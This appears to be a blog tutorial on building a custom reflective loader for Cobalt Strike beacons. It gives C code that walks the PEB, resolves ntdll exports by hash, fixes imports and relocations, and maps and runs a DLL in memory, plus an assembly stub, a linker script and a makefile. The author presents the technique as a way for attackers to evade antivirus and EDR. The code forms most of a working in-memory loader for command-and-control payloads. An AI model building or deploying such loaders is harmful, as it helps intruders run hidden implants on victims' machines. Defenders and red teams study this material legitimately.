# Cobalt Strike - User Defined Reflective Loader Studies

## Introduction

What's up people! In this blog post we're gonna dive into Cobalt Strike's - User Defined Reflective Loader (UDRL), what it is and how to develop your own :). I must proclaim what I'm explaining here is NOT new, there are a couple of URDLs out there already with the most notable being Austin Hudson's ***TitanLdr** ,* C5pider's ***KaynStrike**,* and Boku7's ***BokuLoader**.* Also, custom loaders have been around for over a couple of decades with one of the most notable being Stephen Fewer's - ***Reflective DLL Injection*** technique.

This blog post is more of a *brain dump* of what I've learn't about **UDRLs** rather than an official tutorial as there are still certain aspects I don't understand fully. However, I hope to clarify this concept more and maybe inspire people to look at this feature in Cobalt Strike (CS) and make their own **UDRLs**!

This topic is extensive and unfortunately I won't be able to explain every minor detail so some prior knowledge of the following concepts will most certainly aid you in understanding the topics discussed.

* C Programming Language
* Windows API
* Windows Portable Executable
* Reflective DLL Injection
* Windows Internals
* Cobalt Strike
* Assembly Language

Don't worry though I will be providing a lot of resources throughout this blog post to help you understand these concepts further!

## User Defined Reflective Loader

So, what is a User Defined Reflective Loader? First, we should probably take several steps back and get a high level overview of:

1. Portable Exectuables
2. Reflective DLL Injection

### Portable Executables

What is a [Portable Exeutable](https://learn.microsoft.com/en-us/windows/win32/debug/pe-format) (PE)? Essentially a **PE** in relation to the Windows operating system is the native Win32 file format. If you are a Windows user you may have seen some of these file formats on your PC/Laptop, for example **.exe** and **.dll** are representations of **PEs**.

But what is the point of **PEs**? The **PE** acts as a data structure that tells the Windows OS loader what information is required to manage the wrapped executable code. This information can be used for dynamic library references for linking, API export, import tables, resource management data etc. In essence the **PE** is like a directory filled with information regarding the file format being loaded from  disk into memory.

The **PE** has many sections within it each holding it's own important information (except for the DOS header, it's kinda useless :p) regarding our file format. Here is an example of a **PE's** layout -

<figure><img src="https://2025655796-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MaxwVTT_BnxzQrp_qMJ%2Fuploads%2FRuIuqnoZArFBbP1EMulM%2FWindows_PE.jpg?alt=media&#x26;token=07a22e9a-2eb0-4022-ab4f-13e9077b5a61" alt=""><figcaption></figcaption></figure>

At first glance is looks super confusing, and I'm not gonna lie...it is super confusing when you first learn about **PEs** lol. We'll be going over the sections and headers highlighted in the above image during the coding walkthrough portion of this blog!

### Reflective DLL Injection

Now, some understanding of process injetion in general will be best if you want to understand this concept but I will do my best in order to simplify it as best as I can :). **Reflective DLL Injetion** (RDI) is a technique invented by Stephen Fewer as previously stated, however the concpet that underpins this technique is known as **Manaul Mapping** (MM), which from my research as been around since the late 90's, early 00's!

So what is **RDI**? **RDI** is the technique of creating and loading a [Dynamic-Link Library](https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-libraries) (DLL) in memory to avoid touching the disk. This is a useful technique in relation to malware development because it means as an attacker AV/EDR's will have a harder time detecting your payload unless meticulously scanning in memory.

So how is this technique done? Well, When you need to load a **DLL** in Windows, you need to call [LoadLibrary](https://msdn.microsoft.com/en-us/library/windows/desktop/ms684175\(v=vs.85\).aspx), that takes the file path of a **DLL** and loads it in to memory. However, in our case we're not trying to load from disk. We want to load from memory, and **LoadLibrary** doesn't do that. So we have to create our own **LoadLibrary** functionality.

So essentially for **RDI** we need to load and execute a **DLL** in memory.

Here's an image representation of **RDI** -

<figure><img src="https://2025655796-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MaxwVTT_BnxzQrp_qMJ%2Fuploads%2FscMmqdbp2y4zABO6mtyb%2FRDI.png?alt=media&#x26;token=b5f128f7-9908-4f7b-85f7-382b64d0e6f8" alt=""><figcaption></figcaption></figure>

Again, I'm not gonna lie this topic when first learning it can be confusing and trying to represent the concept in an image is well...not that helpful tbh :|, but here it is none the less ;p.

So after this massive digression we come full circle to our initial question...

**What is a User Defined Reflective Loader?**

Hopefully, after my shoddy explanations of **PE** and **RDI** you should have an inkling of what a **UDRL** is and does. Essentially, it is **CS** allowing you (the operator) the functionality to implement the creation and use of a custom reflective loader within their C2 framework. As an operator this allows us a huge platform to develop a custom payload or post-exploitation beacon with cool features and functionality.

Sounds cool right? But how do we make one?

## &#x20;UDRL Development

So as we've ascertained we need to develop a **DLL** that loads itself, and executes itself in memory. This procedure can be done via [shellcode](https://en.wikipedia.org/wiki/Shellcode). Shellcode is usually written in the Assembly language but doing so is a tedious and tricky task which can go wrong easily. Fortunately for me, people way smarter than myself have developed ways of implementing this concpet in C and taking advantage of the C compiler. The concepts discussed in this blog have been documented by security reseachers such as **Hasherezade** in her [From a C project, through assembly, to shellcode](https://github.com/vxunderground/VXUG-Papers/blob/main/From%20a%20C%20project%20through%20assembly%20to%20shellcode.pdf) whitepaper, and **Modexp's** [Shellcode: In-Memory Execution of DLL](https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/). Implementation of these concepts can also be found within the ***KaynStrike*** and ***TitanLdr*** **UDRLs**.

### Resolving API Addresses in Memory

When a **PE** is loaded via disk, all API calls referenced in the code can be found in the **Import Address Table** (IAT) and **Export Address Table** (EAT). These tables are created by the linker  during compilation. Resolving these tables is done at runtime and handled by default but we don't have that luxury unfortunately. We must resolve API calls by ourselves.

The API functions can be retrieved by using the [**Process Environment Block**](https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/api/pebteb/peb/index.htm) (PEB) which is created at a process' runtime. On execution of the **UDRL** shellcode in our target process, we should be able to locate the **PEB** of the target, and then use that reference to search for the **DLLs** that contain the APIs we wish to load!

Within the **PEB** there are a lot of structures which contain information about the running process. However, the structure we're most concerned with is the **Ldr** structure

We can gain access to a **PEB** via the structure that contains it called the [**Thread Environment Block**](https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/api/pebteb/teb/index.htm) (TEB). The **TEB** is accessed via segement registers in assembly. For 32 bit it is the **FS** register and for 64 bit it is the **GS** register. The related offsets within the **TEB** for these registers are **0x30** (32bit) and **0x60** (64bit).

So, in order to access the **PEB** via C code we can setup a macro to the particular offset relative to the segment register pointing to the **TEB**.

```
#ifdef _WIN64
#define PebLdr __readgsqword(0x60)
#else
#define PebLdr __readfsdword(0x30)
#endif
```

Now, in the **Ldr** structure discussed earlier there is a [linked list](https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/singly-and-doubly-linked-lists) which will give us the name of all the **DLLs** loaded in the memory of a running process. This list can be *walked* in order for us to check if the **DLL** in the list is the **DLL** we need for our APIs. The following code below demonstrates this process

```
GRP_SEC(E) PVOID LoadPebModule(DWORD Hash) {

	PLDR_DATA_TABLE_ENTRY	  ModuleLdr = NULL; 
	PLIST_ENTRY		  PebModule = NULL; 
	PLIST_ENTRY		  NextEntry = NULL;

	PebModule = &((PPEB)PebLdr)->Ldr->InLoadOrderModuleList; 

	NextEntry = PebModule->Flink; 

	do {
		
		ModuleLdr = (PLDR_DATA_TABLE_ENTRY)NextEntry;
	
		
		if (HashFunction(ModuleLdr->BaseDllName.Buffer, ModuleLdr->BaseDllName.Length) == Hash) {
			
			return ModuleLdr->DllBase;
		}
		
		NextEntry = NextEntry->Flink;

	} while (PebModule != NextEntry);

	return NULL; 
}
```

Essentially what the code above is doing is accessing one of the linked lists within the **Ldr** structure called **InLoadOrderModuleList.** We can assign our **NextEntry** variable to the **Flink** parameter of this list and walk through the list checking the current listed **DLLs** name and length against a hash representation of the **DLL** we want. The **ModuleLdr** variable will be a pointer to the the **LDR\_DATA\_TABLE\_ENTRY** stucture which is **NTDLL’s** record of how a **DLL** is loaded into a process. If our hash and **DLL** in the list are a match, success! We can then return the **DLLs** base address via the **DllBase** parameter in **LDR\_DATA\_TABLE\_ENTRY**.

### Looking Up Exports

Once we have the base address of our **DLL** (in our case **ntdll.dll**), we need to find the address of the APIs we'll be using within our code. For our **UDRL** the following APIs will be used -

* **RtlAnsiStringToUnicodeString**
* **NtAllocateVirtualMemory**
* **NtProtectVirtualMemory**
* **LdrGetProcedureAddress**
* **RtlFreeUnicodeString**
* **RtlInitAnsiString**
* **LdrLoadDll**

We can find these functions via the **EAT**. In order to do this we need to traverse the **PE**. Functions are exported by a **DLL** in two ways, name or by ordinal. The **EAT** is accessed through the [**IMAGE\_EXPORT\_DIRECTORY**](https://programmer.help/blogs/export-table-of-pe-file-image_export_directory.html) within the[ **IMAGE\_DATA\_DIRECTORY**](https://learn.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-image_data_directory).

If you're not familar with the **PE** format I'm sure at this stage you're thinking *what on earth is going on!* No problem, this is expected and understanding will come with time lol. However, I'll do my best to explain by walking through the code of the function that will load our exported functions. Below is an example of the code.

```
GRP_SEC(E) PVOID LoadExports(PVOID ZenImage, DWORD Hash) {

	PIMAGE_EXPORT_DIRECTORY		ExportDir	= NULL; 
	PIMAGE_DATA_DIRECTORY		DataDir		= NULL;
	PIMAGE_NT_HEADERS			NtHeaders	= NULL; 
	PIMAGE_DOS_HEADER			DosHeader	= NULL; 

	PDWORD	NameAddress		= NULL;
	PDWORD	FuncAddress		= NULL;
	PWORD	OrdAddress		= NULL;

	DosHeader	= (PIMAGE_DOS_HEADER)ZenImage; 
	

	NtHeaders	= CONVERT(PIMAGE_NT_HEADERS, DosHeader, DosHeader->e_lfanew); 
	

	DataDir		= &NtHeaders->OptionalHeader.DataDirectory[0]; 

	if (DataDir->VirtualAddress) {

		ExportDir	= CONVERT(PIMAGE_EXPORT_DIRECTORY, DosHeader, DataDir->VirtualAddress); 
		

		NameAddress 	= CONVERT(PDWORD, DosHeader, ExportDir->AddressOfNames);
	

		FuncAddress 	= CONVERT(PDWORD, DosHeader, ExportDir->AddressOfFunctions); 
		

		OrdAddress	= CONVERT(PWORD, DosHeader, ExportDir->AddressOfNameOrdinals);  
	

		for (DWORD Index = 0; ExportDir->NumberOfNames != 0; Index++) {

			if (HashFunction(CONVERT(PVOID, DosHeader, NameAddress[Index]), 0) == Hash) {

				return CONVERT(PVOID, DosHeader, FuncAddress[OrdAddress[Index]]); 
			}
		}
	}

	return NULL; 
}
```

So, this is where that image presented in the *Portable Executables* section of the blog comes in handy. First thing we need to do is get the start of our image via [**IMAGE\_DOS\_HEADER**](https://0xrick.github.io/win-internals/pe3/). Basically all **PE** files start with the **DOS** header which occupies the first 64 bytes of the file. This header file really doesn't do much except give us a useful offset to the **e\_lfanew** parameter that points to the **PE/NT** header portion of our **PE**.

The **PE** header is the general term for a structure named [**IMAGE\_NT\_HEADERS**](https://learn.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-image_nt_headers64). This stucture contains important information used by the loader. Within **IMAGE\_NT\_HEADERS** there are 3 members. What we're focused on right now is the **OptionalHeader** member. The name is kinda misleading as it is most certainly not optional with regards to it's importance in the **PE** :p! The **OptionalHeader** is a large structure within the **PE** taking up 224 bytes, and 128 of those bytes belong to the **DataDirectory**!

In the **DataDirectory** we have a number of...directories lol. There are 16 **IMAGE\_DATA\_DIRECTORY** structures. Each of these relate to a structure within the **PE** file. The structure we're interested in is the **IMAGE\_EXPORT\_DIRECTORY** which is the first structure within the **DataDirectory**.

So essentially this portion of code below from our function is just again walking the PE in order to get us to our export directory structure. The **0** you see is just the index of where the export directory is within the list, 0 == first because you know\...computers like to be confusing!

```
DosHeader	= (PIMAGE_DOS_HEADER)ZenImage; 

NtHeaders	= CONVERT(PIMAGE_NT_HEADERS, DosHeader, DosHeader->e_lfanew);  

DataDir		= &NtHeaders->OptionalHeader.DataDirectory[0]; 
```

Now once we reach the **IMAGE\_EXPORT\_DIRECTORY** we need to access the memebers within it. Each structure within the **DataDirectory** contains a **VirtualAddress** and **Size** of the data structure in question. To access the export structure we need to check if the **VirtualAddress** is valid and if that's the case, point the important members to our declared variables. In our situation the members we need are -

**AddressOfFunctions** - A relative virtual address (RVA) that points to an array of addresses for functions in a **DLL**.

**AddressOfNames** - An **RVA** that points to an array of names of the functions in a **DLL**.

**AddressOfOrdinals** - An **RVA** that points to a 16 bit array that contains the ordinals of the named funcitons within a **DLL**.

Essentially our **IMAGE\_EXPORT\_DIRECTORY** points to three arrays. What we want to do is iterate through theses arrays comparing the hash of our function against the **NameAddress** variable. If we get a match to the function we want then the function returns a pointer to the address of the function associated with the **Index**-th export. The pointer is obtained by adding the value stored in the **Index**-th element of the array pointed to by **OrdAddress** (which represents the address of the name ordinal of the **Index**-th export) to the value stored in the **Index**-th element of the array pointed to by FuncAddress (which represents the address of the function of the **Index**-th export), and then adding the result to the base address of the **PE** image.

### Looking Up Imports

Next step is processing the **IAT** of our image loaded into memory. The **IAT** is a table that contains the addresses of functions that are imported from other **DLLs**. When an image is loaded into memory and executed, the **IAT** is used to resolve the addresses of these imported functions so that the image can call them.

The purpose of the function below is to update the **IAT** with the actual addresses of the imported functions. This is necessary because when the image is compiled, the **IAT** contains only the names of the imported functions, not their actual addresses. When the image is loaded into memory, the **IAT** must be updated with the correct addresses of the imported functions so that the image can call them.

Let's step through some code to gain a better understanding.

First thing we need to do is resolve those functions previously mentioned in the *Load Exports* section. This will be done using our **LoadPebModule** and **LoadExports** functions.

```
Resolve.Dll.Ntdll = LoadPebModule(NTDLL_HASH);

	Resolve.Function.RtlAnsiStringToUnicodeString	= LoadExports(Resolve.Dll.Ntdll, RTLANSISTRINGTOUNICODESTRING_HASH);
	Resolve.Function.LdrGetProcedureAddress		= LoadExports(Resolve.Dll.Ntdll, LDRGETPROCEDUREADDRESS_HASH);
	Resolve.Function.RtlFreeUnicodeString		= LoadExports(Resolve.Dll.Ntdll, RTLFREEUNICODESTRING_HASH);
	Resolve.Function.RtlInitAnsiString		= LoadExports(Resolve.Dll.Ntdll, RTLINITANSISTRING_HASH);
	Resolve.Function.LdrLoadDll			= LoadExports(Resolve.Dll.Ntdll, LDRLOADDLL_HASH);
```

Next wext we need to loop through the **Import Directory** which is an array of **IMAGE\_IMPORT\_DESCRIPTOR** structures. These structures contain information about the **DLL** our **PE** file imports functions from.

```
typedef struct _IMAGE_IMPORT_DESCRIPTOR {
    union {
        DWORD   Characteristics;
        DWORD   OriginalFirstThunk;
    } DUMMYUNIONNAME;
    DWORD   TimeDateStamp;
    DWORD   ForwarderChain;
    DWORD   Name;
    DWORD   FirstThunk;
} IMAGE_IMPORT_DESCRIPTOR, *PIMAGE_IMPORT_DESCRIPTOR;
```

The three fields we're interested in are -

* * **OriginalFirstThunk -** Contains offsets to the names of the imported functions.
* * **Name -** Null terminated string of the module to import API from.
* * **FirstThunk -** Contains offsets to the actual addresses of the functions.

Each descriptor contains RVA that points to array of **IMAGE\_THUNK\_DATA** structures. Each entry represents information about the imported API.

```
typedef struct _IMAGE_THUNK_DATA32 {
    union {
        DWORD ForwarderString;      // PBYTE 
        DWORD Function;             // PDWORD
        DWORD Ordinal;
        DWORD AddressOfData;        // PIMAGE_IMPORT_BY_NAME
    } u1;
} IMAGE_THUNK_DATA, * PIMAGE_THUNK_DATA;
```

First thing to do is call the **RtlInitAnsiString** function to initialise the name of the **DLL**. The name of the **DLL** is stored in the **Name** field of the import directory entry and the **RtlInitAnsiString** function initializes an **ANSI** string with a pointer to this data.

Next we call the **RtlAnsiStringToUnicodeString** function to convert the ANSI string to a Unicode string. This is necessary because the **LdrLoadDll** function, which is called later in the loop, expects a Unicode string as its third argument (the **DLL** name). Would be good to note that **LdrLoadDll** is what gets called before jumping into the kernel when **LoadLibrary** is invoked.

```
for (ImportDesc = (PVOID)ImportDir; ImportDesc->Name != 0; ImportDesc++) {

		Name = CONVERT(PVOID, ZenImage, ImportDesc->Name); 

		Resolve.Function.RtlInitAnsiString(&AniDllName, Name); 

		Status = Resolve.Function.RtlAnsiStringToUnicodeString(&UniDllName, &AniDllName, TRUE);
```

We then call our **LdrLoadDll** function to the load the **DLL** into memory. This function returns a handle to the **DLL** in the **DllHandle** variable.

Once we have a handle to our **DLL** we need to initialize two pointers to the start of the **OriginalFirstThunk** (OFT) and the **FirstThunk** (FT) tables for the **DLL**, respectively. These tables contain the entries for the functions that the image imports from the **DLL**. The **OFT** contains the original names of the imported functions as they appeared in the image's import table, while **FT** contains the actual addresses of the imported functions in memory.

```
if (NT_SUCCESS(Status)) {

    Status = Resolve.Function.LdrLoadDll(NULL, 0, &UniDllName, &DllHandle); 

    if (NT_SUCCESS(Status)) {

	OrgThunk	= CONVERT(PIMAGE_THUNK_DATA, ZenImage, ImportDesc->OriginalFirstThunk); 
				

	FirstThunk	= CONVERT(PIMAGE_THUNK_DATA, ZenImage, ImportDesc->FirstThunk); 

```

Now we can iterate through the entries in the **OFT** and **FT** tables. For each entry, and check whether the entry specifies an imported function by name or by ordinal. If the entry specifies an imported function by name, it calls the **LdrGetProcedureAddress** function (This is the function that **GetProcAddress** calls when invoked) to look up the address of the function in the **DLL** and updates the corresponding entry in the **FT** table with the correct address. If the entry specifies an imported function by ordinal, it calls the **LdrGetProcedureAddress** function to look up the address of the function in the **DLL** by its ordinal and updates the corresponding entry in the **FT** table with the correct address.

When the loop finishes, the **FT** table will contain the correct addresses of all the imported functions from the **DLL**, and the image will be able to call these functions when it is executed.

```
while (OrgThunk->u1.AddressOfData != 0) {

     if (IMAGE_SNAP_BY_ORDINAL(OrgThunk->u1.Ordinal)) {

	Status = Resolve.Function.LdrGetProcedureAddress(DllHandle, 0, IMAGE_ORDINAL(OrgThunk->u1.Ordinal), &FuncAddr); 

		if (NT_SUCCESS(Status)) {

		   FirstThunk->u1.Function = FuncAddr; 
		}
     }
     else {

	    ImportName = CONVERT(PIMAGE_IMPORT_BY_NAME, ZenImage, OrgThunk->u1.AddressOfData); 
						
	    Resolve.Function.RtlInitAnsiString(&AniDllName, (PVOID)ImportName->Name);

	    Status = Resolve.Function.LdrGetProcedureAddress(DllHandle, &AniDllName, 0, &FuncAddr); 

	   if (NT_SUCCESS(Status)) {

		FirstThunk->u1.Function = FuncAddr;
	   }

     }

	OrgThunk++; 

	FirstThunk++; 
}
```

Lastly, the loop then calls the **RtlFreeUnicodeString** function to free the memory used by the Unicode string.

### Relocations

Some quick theory to explain what we're doing here. When an **PE** file is created by the linker it has to make an assumption about where the file will be mapped into memory. This assumption leads the linker to hard code addresses of code and data items within the compiled **PE** file. If the PE file is not loaded from the base address hard-coded into the file...we have a problem. In order to circumvent this issue the offsets regarding the hard-coded information are stored in the **.reloc** section of the section header. This section allows the **PE** loader to fix the addresses in the loaded image.

The entries within the **.reloc** section are called *base relocations* as they depend of the base address of the loaded image. This is just a list of locations in the image. The base relocation entries are allocated in a series of variable length chunks, with each chunk representing the relocations for one 4KB page in the image.

So, for our function we need to process a directory of image base relocations for an image in memory. The directory is an array of **IMAGE\_BASE\_RELOCATION** structures.

```
typedef struct _IMAGE_BASE_RELOCATION {
  DWORD   VirtualAddress;
  DWORD   SizeOfBlock;
} IMAGE_BASE_RELOCATION, *PIMAGE_BASE_RELOCATION;
```

The **VirtualAddress** field specifies the virtual address of the first byte of the page where the base relocations are applied. The **SizeOfBlock** field specifies the size of the block, in bytes, including the **IMAGE\_BASE\_RELOCATION** structure and all of the **IMAGE\_RELOC** structures that follow it.

The **IMAGE\_RELOC** structure is defined as follows:

```
typedef struct _IMAGE_RELOC {
    WORD Offset : 12;
    WORD Type : 4;
} IMAGE_RELOC, * PIMAGE_RELOC;
```

First we need to initialise a pointer to the start of the relocation directory, then initialise a variable to the difference between the image base address of where the file is loaded in memory and the image base address that was specified when the image was compiled. This difference is referred to as the **delta**.

```
ImgBaseReloc	= (PVOID)BaseRelocDir; 

Delta		= (PVOID)((ULONG_PTR)ZenImage - (ULONG_PTR)ImageBase);
```

The function then enters a loop that iterates over all of the blocks in the relocation directory. For each block, it initializes a pointer to the start of the block and enters another loop that iterates over all of the relocations in the block.

```
for (; ImgBaseReloc->VirtualAddress != 0; ImgBaseReloc = (PVOID)Relocation) {

	Relocation = (PIMAGE_RELOC)(ImgBaseReloc + 1); 

	for (; (PBYTE)Relocation != CONVERT(PBYTE, ImgBaseReloc, ImgBaseReloc->SizeOfBlock); R
```

For each relocation, the function reads the **Type** field and applies the relocation based on the value of this field. There are several different types of relocations that can be applied, but the function only handles three of them.

**IMAGE\_REL\_BASED\_DIR64** and **IMAGE\_REL\_BASED\_HIGHLOW** are combined within a macro called **IMAGE\_REL\_TYPE** and **IMAGE\_REL\_BASED\_ABSOLUTE** which is just used as padding so the next relocation is aligned on a 4-byte boundry.

```
switch (Relocation->Type) {

	case IMAGE_REL_BASED_ABSOLUTE:

		break; 

        case IMAGE_REL_TYPE:

             *(ULONG_PTR*)((PBYTE)ZenImage + ImgBaseReloc->VirtualAddress + Relocation->Offset) += (ULONG_PTR)Delta; 

				
	}
 
```

### DLL Entry

Finally! We've got all the components necessary for loading a **PE**. Our final step is to set up a main function that will process all this information and execute our **UDRL** in memory. The process behind our main function requires the following steps.

* Allocate memory for size of our image
* Copy each section to our new allocated memory space
* Initialise import table
* Apply relocations
* Set the memory permission to be executable
* Execute entry point of DLL

First step is initialising some function calls, [**NtAllocateVirtualMemory**](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntallocatevirtualmemory) and [**NtProtectVirtualMemory**](https://doxygen.reactos.org/d2/dfa/ntoskrnl_2mm_2ARM3_2virtual_8c.html#a2cab978ee136ac00a0c06b56aa9170ef) functions in the **ntdll** library.

```
Resolve.Dll.Ntdll = LoadPebModule(NTDLL_HASH);

Resolve.Function.NtAllocateVirtualMemory	= LoadExports(Resolve.Dll.Ntdll, NTALLOCATEVIRTUALMEMORY_HASH);

Resolve.Function.NtProtectVirtualMemory		= LoadExports(Resolve.Dll.Ntdll, NTPROTECTVIRTUALMEMORY_HASH);
```

As our code is being injected into memory we first need to find ourself in the target process' memory space. The **CODE\_END()** macro calculates the end address of a code section relative to the address of the **GetIp** (instruction pointer) symbol in memory. Typecasting this macro to a pointer of our **IMAGE\_DOS\_HEADER** should give us the starting point of our **PE** in memory. This technique is used in **TitanLdr**.

```
#define CODE_END( x )	(ULONG_PTR)( GetIp( ) + 11 )
```

Next, the function obtains the size of our PE image via **SizeOfImage** and allocates a page of memory with **NtAllocateVirtualMemory**.

```
DosHeader = (PIMAGE_DOS_HEADER)CODE_END();

NtHeaders = CONVERT(PIMAGE_NT_HEADERS, DosHeader, DosHeader->e_lfanew);

ZenImageSize = NtHeaders->OptionalHeader.SizeOfImage; 

Status = Resolve.Function.NtAllocateVirtualMemory(NtCurrentProcess(), &ZenBaseAddress, 0, &ZenImageSize, MEM_COMMIT, PAGE_READWRITE);
```

We then need to loop through all the sections of a **PE** file and copy their contents into a new location in memory. The **PE** file is made up of several [sections](https://keystrokes2016.wordpress.com/2016/06/03/pe-file-structure-sections/) that each contain different types of data, such as code, data, or resources.

The **IMAGE\_FIRST\_SECTION** macro returns a pointer to the first section of the **PE** file, **NumberOfSections** is a field that specifies the total number of sections in the file. The loop iterates through each section using an index variable **Index**, which starts at **0** and goes up to one less than the number of sections.

Inside the loop we need to copy the contents of each section from its location in the original **PE** file to a new location in memory. The destination address is calculated by adding the section's virtual address to the base address of the new memory region, and the source address is calculated by adding the section's raw data offset to the base address of the original **PE** file. The size of the data to copy is specified by the **SizeOfRawData** field of the section header.

Overall, this code is essentially copying the entire contents of the original **PE** file into a new memory region, with each section being placed at its correct virtual address.

```
if (NT_SUCCESS(Status)) {

SecHeader = IMAGE_FIRST_SECTION(NtHeaders);

SIZE_T Index = 0;
while (Index < NtHeaders->FileHeader.NumberOfSections) {

  MemCpy
      (

       (PBYTE)ZenBaseAddress + SecHeader[Index].VirtualAddress,
       (PBYTE)DosHeader + SecHeader[Index].PointerToRawData,
       SecHeader[Index].SizeOfRawData
      );

      Index++;
}
```

The next step is processing the **IAT** and relocation table in the input **PE** image. These need to be accessed through the **IMAGE\_DATA\_DIRECTORY** discussed previously.

```
DataDir = &NtHeaders->OptionalHeader.DataDirectory[1];

if (DataDir->VirtualAddress) {

  LoadImports((PVOID)ZenBaseAddress, CONVERT(PVOID, ZenBaseAddress, DataDir->VirtualAddress));
}

DataDir = &NtHeaders->OptionalHeader.DataDirectory[5];

if (DataDir->VirtualAddress) {

  LoadRelocations((PVOID)ZenBaseAddress, CONVERT(PVOID, ZenBaseAddress, DataDir->VirtualAddress), NtHeaders->OptionalHeader.ImageBase);
}
```

The initial protections on our memory pages are **PAGE\_READWRITE**, we'd need to change that in order to actually execute our **DLL** in memory. Once that is done we retrieve the address of the entry point function in the input **PE** image and call it, passing the address of the struct as an argument. The entry point function is responsible for setting up the remaining program state and transferring control to the program's main code.

```
SecSize = SecHeader->SizeOfRawData;

Status = Resolve.Function.NtProtectVirtualMemory(NtCurrentProcess(), &ZenBaseAddress, &SecSize, PAGE_EXECUTE_READ, &Protections);

if (NT_SUCCESS(Status)) {

  ZenEntry = CONVERT(ZenDllMain, ZenBaseAddress, NtHeaders->OptionalHeader.AddressOfEntryPoint);
  ZenEntry(SYMBOL(Start), 1, NULL);
  ZenEntry(SYMBOL(Start), 4, NULL);
}
```

The **ZenEntry** variable represents **DllMain** which is an entry point into a **DLL**. When the system starts or terminates a process or thread, it calls the entry-point function for each loaded **DLL** using the first thread of the process.

```
BOOL WINAPI DllMain(
  _In_ HINSTANCE hinstDLL,
  _In_ DWORD     fdwReason,
  _In_ LPVOID    lpvReserved
);
```

The **SYMBOL** macro calculates the address of a symbol **x** which is represenetd by a function called **Start** relative to the address of the **GetIp** symbol in memory. Both **Start** and **GetIp** are essentially Assembly stubs we can combine with our C code. Again, this concept is used in ***TitanLdr***.

```
#define SYMBOL( x )      ( ULONG_PTR )( GetIp( ) - ( ( ULONG_PTR ) & GetIp - ( ULONG_PTR ) x ) )
```

## Combining C & Assembly

Woah, that was a lot of info right? If you're still with us, I salute you :). If not, no worries I completely understand why, lmao!

So it should be stated that I am no Assembly wizard but will do my best to provide an explanation regarding the code and concepts being applied in this section.

### Section Alignment

Now, when initialising and delcaring our function calls there will be a **GRP\_SEC(x)** parameter before the function type and name...why? Essentially the Windows **PE** has a functionality called **Grouped Sections**. This allows multiple sections to be treated as a single unit with respect to certain operations.

In a **PE** file, sections are used to store various types of data, such as code, resources, and data. When the file is loaded into memory, the sections are mapped into memory as separate regions, with each section having its own address and protection attributes.

Grouped sections allow two or more adjacent sections to be treated as a single unit for the purposes of memory mapping and file alignment. This is accomplished by assigning the same section characteristics to each section in the group and specifying the total size of the group in the section header of the first section. This means that the sections within a group can share the same protection attributes and alignment requirements, which can help to reduce file size and improve loading performance.

Our macro looks like this -

```
#define GRP_SEC( x ) __attribute__(( section( ".text$" #x ) ))
```

Windows documentation states

> ***When determining the image section that will contain the contents of an object section, the linker discards the "$"? and all characters that follow it. Thus, an object section named .text$X actually contributes to the .text section in the image.***
>
> ***However, the characters following the "$"? determine the ordering of the contributions to the image section. All contributions with the same object-section name are allocated contiguously in the image, and the blocks of contributions are sorted in lexical order by object-section name. Therefore, everything in object files with section name .text$X ends up together, after the .text$W contributions and before the .text$Y contributions.***

In order to implement this we can create a linker file using the **SECTIONS** command which is used to create different sections in the final **PE** file generated. This is a technique used in ***TitanLdr***.

```
SECTIONS
{
   .text :
   {
      *( .text$A )
      *( .text$B )
      *( .text$C )
      *( .text$D )
      *( .text$E )
      *( .rdata* )
      *( .text$F )
    }
}
```

### Stack Alignment

We'll be compiling our shellcode in 64bit, this means we will need a 16-byte stack alignment. That is to say that if you are to push only 1 8-byte value onto the stack, you should pad it by adding the other 8 bytes.This is due to a requirement imposed by utilizing 128-bit XMM registers. We can make sure this stack alignment is implemented in some simple assembly code.

```
[BITS 64]

Extern ZenLdr

GLOBAL Start

[SECTION .text$A]

Start:

    push rsi
    mov rsi, rsp
    and rsp, 0FFFFFFFFFFFFFFF0h
    sub rsp, 020h
    call ZenLdr
    mov rsp, rsi
    pop rsi
    ret
```

Quick overview -

**\[BITS 64]** - Highlights this assembly code is operating within a x64 architecture.

**Extern ZenLdr** - This the **Extern** type represents an external function that will be called from outside the assembly code in our case **ZenLdr** which is the name of our main function.

**GLOBAL Start** - Highlights a procedure that will take place within our assembly code, but also allows us to call this procedure within our C code.

Now, your keen eye may notice the **\[SECTION .text$A]**. This is what we were previously discussing in the *Section Alignment* walkthrough. Here we are placing the instructions called within our **Start** procedure in the **.text$A** portion of our text section. This will be the first function called in our shellcode. This is because if our stack isn't aligned correctly the rest of the code won't execute.

The actual **Start** procedure works like this -

\- Push RSI onto the stack\
\- Save the value of RSP so it can be restored\
\- Align RSP to 16 bytes\
\- Allocate space for our main function\
\- Call the entry point of the main function\
\- Restore the original value of RSP\
\- Restore RSI\
\- Return to caller

## PE Extraction

Once our code is compiled into an executable we'll need to extract the raw binary in-order to execute as shellcode. There's a couple of ways of doing this one is using objdump on our executable, then placing that output within a **.bin** file. However, Python has a module called [pefile](https://pefile.readthedocs.io/en/latest/modules/pefile.html) that is a nice way of extracting our **.text** section which is what the CS documentation states -

> ***The reflective loader's executable code is the extracted .text section from a user provided compiled object file. The extracted executable code must be less than 100KB.***

## Compilation

In order to compile the UDRL we'll be using [***x86\_64-w64-mingw32-gcc***](https://www.mingw-w64.org/downloads/). When compiling the code certain flags need to be put in palce in-order to set the correct [function odering, linking scripts, and preventing the inclusion of extraneous code](https://www.rapid7.com/blog/post/2019/11/21/metasploit-shellcode-grows-up-encrypted-and-authenticated-c-shells/) etc.

Below is an example of the complete makefile.

```
CC_X64	:= x86_64-w64-mingw32-gcc

CFLAGS	:= $(CFLAGS) -Os -fno-asynchronous-unwind-tables -nostdlib 
CFLAGS 	:= $(CFLAGS) -fno-ident -fpack-struct=8 -falign-functions=1
CFLAGS  := $(CFLAGS) -s -ffunction-sections -falign-jumps=1 -w
CFLAGS	:= $(CFLAGS) -falign-labels=1 -fPIC -Wl,-TSectionLink.ld
LFLAGS	:= $(LFLAGS) -Wl,-s,--no-seh,--enable-stdcall-fixup

OUTX64	:= ZenLdr.x64.exe
